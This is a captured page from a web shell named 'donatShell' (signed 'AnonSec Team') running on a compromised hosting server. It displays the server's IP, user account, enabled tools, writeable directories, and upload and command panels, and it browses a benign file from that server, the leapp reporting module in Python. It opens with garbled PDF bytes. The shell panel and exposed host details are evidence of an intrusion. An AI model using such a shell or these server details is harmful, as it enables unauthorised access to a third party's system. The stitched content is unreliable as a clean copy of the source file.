%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY donat Was Here
donatShell
Server IP : 188.40.95.74  /  Your IP : 216.73.216.205
Web Server : Apache
System : Linux cp01.striminghost.net 3.10.0-1160.119.1.el7.tuxcare.els13.x86_64 #1 SMP Fri Nov 22 06:29:45 UTC 2024 x86_64
User : vlasotin ( 1054)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/lib/python2.7/site-packages/leapp/reporting/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /usr/lib/python2.7/site-packages/leapp/reporting/__init__.py
import datetime
import json
import hashlib
import logging
import os
import six

from leapp.compat import string_types
from leapp.models import fields, Model, ErrorModel
from leapp.topics import ReportTopic
from leapp.libraries.stdlib.api import produce
from leapp.utils.deprecation import deprecated


class Report(Model):
    """
    Framework model used for reporting
    """

    __non_inheritable__ = True

    topic = ReportTopic

    report = fields.JSON()


def _add_to_dict(data, path, value, leaf_list=False, flat_list=False):
    for p in path[:-1]:
        if p not in data:
            data[p] = {}
        data = data[p]

    if leaf_list:
        list_val = [value]
        if flat_list and isinstance(value, list):
            list_val = value
        data[path[-1]] = data.get(path[-1], []) + list_val
    else:
        if path[-1] in data:
            raise ValueError('Path {} is already taken'.format('.'.join(path)))
        data[path[-1]] = value


class BasePrimitive(object):
    """
    Report primitive (field) base class for dict targets (implies unique path)
    """
    # deepest nested key in resulting report dict
    name = ''

    def __init__(self, value=None):
        if not isinstance(value, string_types):
            raise TypeError('Value of "{}" must be a string'.format(self.__class__.__name__))
        self._value = value

    @property
    def value(self):
        """Return report field value"""
        return self._value

    @property
    def path(self):
        """Return report field destination path (nested dict description)"""
        return (self.name, )

    def to_dict(self):
        return {self.name: self._value}

    def apply(self, report):
        """Add report entry to the report dict based on provided path"""
        _add_to_dict(report, self.path, self.value, leaf_list=False)


class BaseListPrimitive(BasePrimitive):
    """
    Report primitive (field) base class for list targets (we append value to a list)
    """

    def apply(self, report):
        """Add report entry to the report dict based on provided path"""
        _add_to_dict(report, self.path, self.value, leaf_list=True, flat_list=True)


class Title(BasePrimitive):
    """Report title"""
    name = 'title'


class Summary(BasePrimitive):
    """Report summary"""
    name = 'summary'


class Severity(BasePrimitive):
    """Report severity"""
    name = 'severity'

    INFO = 'info'
    LOW = 'low'
    MEDIUM = 'medium'
    HIGH = 'high'

    def __init__(self, value=None):
        severities = (self.INFO, self.LOW, self.MEDIUM, self.HIGH)
        if value not in severities:
            raise ValueError('Severity should be one of: "{}"'.format(' '.join(severities)))
        self._value = value


class Audience(BasePrimitive):
    """Target audience of the report"""
    name = 'audience'

    def __init__(self, value=None):
        if not isinstance(value, string_types):
            raise TypeError('Value of "Audience" must be a string')
        audiences = ('sysadmin', 'developer')
        if value not in audiences:
            raise ValueError('Audience should be one of: "{}"'.format(' '.join(audiences)))
        self._value = value


class Groups(BaseListPrimitive):
    """Report groups."""
    name = 'groups'

    INHIBITOR = 'inhibitor'
    # This is used for framework error reports
    # Reports indicating failure in actors should use the FAILURE group
    _ERROR = 'error'
    FAILURE = 'failure'
    ACCESSIBILITY = 'accessibility'
    AUTHENTICATION = 'authentication'
    BOOT = 'boot'
    COMMUNICATION = 'communication'
    DESKTOP = 'desktop environment'
    DRIVERS = 'drivers'
    EMAIL = 'email'
    ENCRYPTION = 'encryption'
    FILESYSTEM = 'filesystem'
    FIREWALL = 'firewall'
    HIGH_AVAILABILITY = 'high availability'
    KERNEL = 'kernel'
    MONITORING = 'monitoring'
    NETWORK = 'network'
    OS_FACTS = 'OS facts'
    POST = 'post'
    PUBLIC_CLOUD = 'public cloud'
    PYTHON = 'python'
    REPOSITORY = 'repository'
    RHUI = 'rhui'
    SANITY = 'sanity'
    SECURITY = 'security'
    SELINUX = 'selinux'
    SERVICES = 'services'
    TIME_MANAGEMENT = 'time management'
    TOOLS = 'tools'
    UPGRADE_PROCESS = 'upgrade process'

    def __init__(self, value=None):
        if not isinstance(value, list):
            raise TypeError('Value of "Groups" must be a list')
        self._value = value


@deprecated(
    since='2022-08-23',
    message=(
        'The primitive is deprecated as Tags and Flags have been joined into the Groups primitive.'
        'Please use Groups for report message typing instead.'
    )
)
class Tags(Groups):
    def __init__(self, *args, **kwargs):
        super(Tags, self).__init__(*args, **kwargs)


@deprecated(
    since='2022-08-23',
    message=(
        'The primitive is deprecated as Tags and Flags have been joined into the Groups primitive.'
        'Please use Groups for report message typing instead.'
    )
)
class Flags(Groups):
    def __init__(self, *args, **kwargs):
        super(Flags, self).__init__(*args, **kwargs)


# To allow backwards-compatibility with previous report-schema
# Groups that match _DEPRECATION_FLAGS will be shown as flags, the rest as tags
_DEPRECATION_FLAGS = [Groups.INHIBITOR, Groups.FAILURE]

# NOTE(mmatuska): this a temporary solution until Groups._ERROR in the json report-schema
# is altered to account for this addition of Groups_ERROR
_UPCOMING_DEPRECATION_FLAGS = [Groups._ERROR]


class Key(BasePrimitive):
    """Stable identifier for report entries."""
    name = 'key'

    def __init__(self, uuid):
        # uuid is allowed to be string or unicode only, checking in py2/py3 friendly mode
        if not isinstance(uuid, six.string_types):
            raise ValueError('Key value should be a string.')

        self._value = uuid


class ExternalLink(BaseListPrimitive):
    """External link report detail field"""
    name = 'external'

    def __init__(self, url=None, title=None):
        if not all(isinstance(v, string_types) for v in (url, title)):
            raise TypeError('Values "url" and "title" of "ExternalLink" must be a string')
        self._value = {'url': url, 'title': title}

    @property
    def path(self):
        return ('detail', 'external')


class RelatedResource(BaseListPrimitive):
    """Report detail field for related resources (e.g. affected packages/files)"""
    name = 'related_resources'

    def __init__(self, scheme=None, identifier=None):
        if not all(isinstance(v, string_types) for v in (scheme, identifier)):
            raise TypeError('Values "scheme" and "identifier" of "RelatedResource" must be a string')
        self._value = {'scheme': scheme, 'title': identifier}

    @property
    def path(self):
        return ('detail', 'related_resources')


class BaseRemediation(BaseListPrimitive):
    """Remediation base class"""
    name = 'remediations'

    @property
    def path(self):
        return ('detail', 'remediations')


def _guarantee_encoded_str(text, encoding='utf-8'):
    """Guarantees that result is a utf-8 encoded string"""
    # Apply conversion only in py2 case
    if six.PY3:
        return text
    # Unless data is already encoded -> encode it
    try:
        return text.encode(encoding)
    except (UnicodeDecodeError, AttributeError):
        return text


def _guarantee_decoded_str(text, encoding='utf-8'):
    """Guarantees that result is 'native' text"""
    # Apply conversion only in py2 case
    if six.PY3:
        return text
    # Unless data is already decoded -> decode it
    try:
        return text.decode(encoding)
    except (UnicodeEncodeError, AttributeError):
        return text


class RemediationCommand(BaseRemediation):
    def __init__(self, value=None):
        if not isinstance(value, list):
            raise TypeError('Value of "RemediationCommand" must be a list')
        self._value = {'type': 'command', 'context': [_guarantee_decoded_str(c) for c in value]}

    def __repr__(self):
        # NOTE(ivasilev) As the message can contain non-ascii characters let's deal with it properly.
        # As per python practices repr has to return an encoded string
        return "[{}] {}".format(self._value['type'],
                                ' '.join([_guarantee_encoded_str(c) for c in self._value['context']]))


class RemediationHint(BaseRemediation):
    def __init__(self, value=None):
        self._value = {'type': 'hint', 'context': _guarantee_decoded_str(value)}

    def __repr__(self):
        # NOTE(ivasilev) As the message can contain non-ascii characters let's deal with it properly.
        # As per python practices repr has to return an encoded string
        return "[{}] {}".format(self._value['type'], _guarantee_encoded_str(self._value['context']))


class RemediationPlaybook(BaseRemediation):
    def __init__(self, value=None):
        self._value = {'type': 'playbook', 'context': _guarantee_decoded_str(value)}

    def __repr__(self):
        # NOTE(ivasilev) As the message can contain non-ascii characters let's deal with it properly.
        # As per python practices repr has to return an encoded string
        return "[{}] {}".format(self._value['type'], _guarantee_encoded_str(self._value['context']))


class Remediation(object):
    def __init__(self, playbook=None, commands=None, hint=None):
        self._remediations = []
        if hint:
            self._remediations.append(RemediationHint(value=hint))
        if commands:
            for command in commands:
                self._remediations.append(RemediationCommand(value=command))
        if playbook:
            self._remediations.append(RemediationPlaybook(value=playbook))

    def apply(self, report):
        for remediation in self._remediations:
            remediation.apply(report)

    def __repr__(self):
        return "\n".join([repr(r) for r in self._remediations])

    def to_dict(self):
        return {'remediations': [r.to_dict() for r in self._remediations]}

    @classmethod
    def from_dict(cls, data):
        values = data.get('remediations', [])
        playbook = next((v['context'] for v in values if v['type'] == 'playbook'), None)
        hint = next((v['context'] for v in values if v['type'] == 'hint'), None)
        commands = [v['context'] for v in values if v['type'] == 'command']
        if values:
            return Remediation(playbook, commands, hint)


def _sanitize_entries(entries):
    if not any(isinstance(e, Title) for e in entries):
        raise ValueError('Title not provided in the report.')
    if not any(isinstance(e, Summary) for e in entries):
        raise ValueError('Summary not provided in the report.')
    if not any(isinstance(e, Severity) for e in entries):
        entries.append(Severity('info'))
    if not any(isinstance(e, Audience) for e in entries):
        entries.append(Audience('sysadmin'))
    _check_stable_key(entries, raise_if_undefined=os.getenv('LEAPP_DEVEL_FIXED_REPORT_KEY', '0') != '0')


def _check_stable_key(entries, raise_if_undefined=False):
    """
    Inserts a Key into the entries of the report if it doesn't exist.

    The resulting id is calculated from the mandatory report
    entries (severity, audience, title).
    Please note that the original entries list is modified.
    """
    def _find_entry(cls):
        entry = next((e for e in entries if isinstance(e, cls)), None)
        if entry:
            return entry._value

    logger = logging.getLogger('leapp.reporting')
    key = _find_entry(Key)
    if key is not None:
        # Key is already there, check that it's not an empty string
        if not key.strip():
            logger.error('An empty string is specified as Key')
            raise ValueError('Key can not be an empty string.')
        return

    if raise_if_undefined:
        raise ValueError('Stable Key report entry with specified unique value not provided')

    # No Key found - let's generate one!
    key_str = u'{severity}:{audience}:{title}'.format(severity=_find_entry(Severity),
                                                      audience=_find_entry(Audience),
                                                      title=_find_entry(Title))
    key_value = hashlib.sha1(key_str.encode('utf-8')).hexdigest()
    entries.append(Key(key_value))
    logger.warning('Stable Key report entry not provided, dynamically generating one - {}'.format(key_value))


def _create_report_object(entries):
    report = {}

    _sanitize_entries(entries)
    for entry in entries:
        entry.apply(report)

    if Groups.INHIBITOR in report.get('groups', []):
        if Groups._ERROR in report.get('groups', []):
            # *error != inhibitor*
            msg = ('Only one of Groups._ERROR and Groups.INHIBITOR can be set at once.'
                   ' Maybe you were looking for Groups.FAILURE?')
            raise ValueError(msg)

        # Before removing Flags, the original inhibitor detection worked
        # by checking the `flags` field; keep the `flags` field until we drop Flags completely
        # Currently we know that 'flags' does not exist otherwise so it's
        # safe to just set it
        report['flags'] = [Groups.INHIBITOR]
    if Groups._ERROR in report.get('groups', []):
        # see above for explanation
        report['flags'] = [Groups._ERROR]

    return Report(report=report)


def create_report(entries):
    """
    Produce final report message
    """
    produce(_create_report_object(entries))


_DEPRECATION_SEVERITY_THRESHOLD = datetime.timedelta(days=180)


def create_report_from_deprecation(deprecation):
    """
    Convert deprecation json to report json
    """
    since = datetime.datetime.strptime(deprecation['since'], '%Y-%m-%d').date()

    severity = Severity.MEDIUM
    if since < (datetime.date.today() - _DEPRECATION_SEVERITY_THRESHOLD):
        severity = Severity.HIGH

    report = _create_report_object([
        Title('{message} at {filename}:{lineno}'.format(
            message=deprecation['message'].split('\n')[0],
            filename=deprecation['filename'],
            lineno=deprecation['lineno'])),
        Severity(severity),
        Audience('developer'),
        Summary('{reason}\nSince: {since}\nLocation: {filename}:{lineno}\nNear: {line}'.format(
            reason=deprecation['reason'],
            since=deprecation['since'],
            filename=deprecation['filename'],
            lineno=deprecation['lineno'],
            line=deprecation['line']
        )),
    ])
    return json.loads(report.dump()['report'])


def create_report_from_error(error_dict):
    """
    Convert error json to report json
    """
    error = ErrorModel.create(error_dict)
    entries = [
        Title(error.message),
        Summary(error.details or ""),
        Severity('high'),
        Audience('sysadmin'),
        Groups([Groups._ERROR])
    ]
    report = _create_report_object(entries)
    return json.loads(report.dump()['report'])

Anon7 - 2022
AnonSec Team